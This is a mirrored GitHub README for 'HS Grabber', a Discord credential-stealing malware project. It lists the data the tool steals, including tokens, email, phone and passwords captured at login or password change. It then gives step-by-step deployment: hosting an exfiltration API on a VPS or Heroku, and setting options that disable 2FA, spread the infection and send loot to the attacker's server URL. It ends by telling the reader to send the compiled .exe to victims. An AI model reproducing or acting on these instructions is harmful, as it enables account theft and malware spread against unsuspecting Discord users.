Giter Club home page Giter Club logo

hs-grabber's Introduction

⚠️ Personal Purpose, we are not responsable of your acts ⚠️

HS Grabber

An powerful discord token grabber / discord token stealer stole discord password, info, etc, same when you change password. Need a screenshot ?

  • 10 Star = video tutorial
  • 15 Star = auto builder

Features

  • Steal Discord info
    • Username
    • E-mail
    • Phone Number
    • Nitro Type
    • ID
  • Steal Discord token
    • Discord
    • Discord PTB
    • Discord Dev
  • Steal Discord Password : When you change password & When you change e-mail & When you log-in in your discord account
    • Discord
    • Discord PTB
    • Discord Dev

How to use

#1 : API Hosting

Method 1 : (require a vps)

Open port 80

Install Apache2 :

$ sudo apt-get update
$ sudo apt-get install apache2

Test server :

$ curl urserverurl

Configure Firewall :

$ sudo ufw allow 'Apache'

Verify the change :

$ sudo ufw status

Install API :

$ git clone https://github.com/Stanley-GF/api.git

Configure port & ip in the main index.js

$ cd api
$ nano index.js

Configure webhook url :

$ cd api/endpoints
$ nano index.js

Your API URL gonna be : http://your-vps-ip/api/v1/send (replace your-vps-ip by ur real vps ip, obviously)

Method 2 : Heroku (the best for beginner)

#2 : Your .exe

  • Download src of this project
  • Open project
  • Go in settings.cs and configure option :
public static bool disableMfa = false; // disable 2FA 

public static bool restartDiscord = true; // restart discord after injection

public static bool spread = true; // ALWAYS TRUE : (for infect client)

private static string serverurl = "https://your-app-name.herokuapp.com/api/v1/send"; // replace "your-app-name.herokuapp.com/api/v1/send" by your api url

public static string Url = "https://cors-anywhere2.herokuapp.com/" + serverurl; // don't tuch.
  • Compile the project
  • Go in \HS-Grabber\HS-Grabber\bin\Debug
  • Send the .exe to victims !

Some screenshot of the grabber

yay

Coded with ❤️ By

Name Helped for
HideakiAtsuyo API
Stan Code & a bit of the API
Igor API

hs-grabber's People

Contributors

stanley-gf avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.